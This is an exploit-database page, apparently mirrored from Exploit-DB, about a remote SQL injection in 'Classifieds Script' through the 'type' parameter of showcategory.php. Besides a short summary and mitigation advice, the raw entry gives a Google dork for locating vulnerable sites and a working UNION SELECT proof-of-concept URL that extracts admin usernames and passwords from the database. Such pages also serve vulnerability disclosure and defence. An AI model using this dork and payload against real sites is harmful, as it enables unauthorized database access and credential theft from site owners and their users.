header-logo
Suggest Exploit
vendor:
Classifieds Script
by:
Hussin X
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classifieds Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Classifieds Script (type) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the Classifieds Script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains malicious SQL statements that are executed in the backend database. The malicious SQL statement can be used to extract sensitive information from the database, such as usernames and passwords. The proof-of-concept (POC) code provided in the text can be used to exploit this vulnerability.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.
Source

Exploit-DB raw data:

Classifieds Script (type) Remote SQL Injection Vulnerability

|    Author: Hussin X
|
|    Home :  www.iq-ty.com<http://www.iq-ty.com>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
| d0rk : inurl:"showcategory.php?type"


POC :

http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--


#end

IQ-SecuritY FoRuM

Navigation

Suggest Exploit

Services By CQR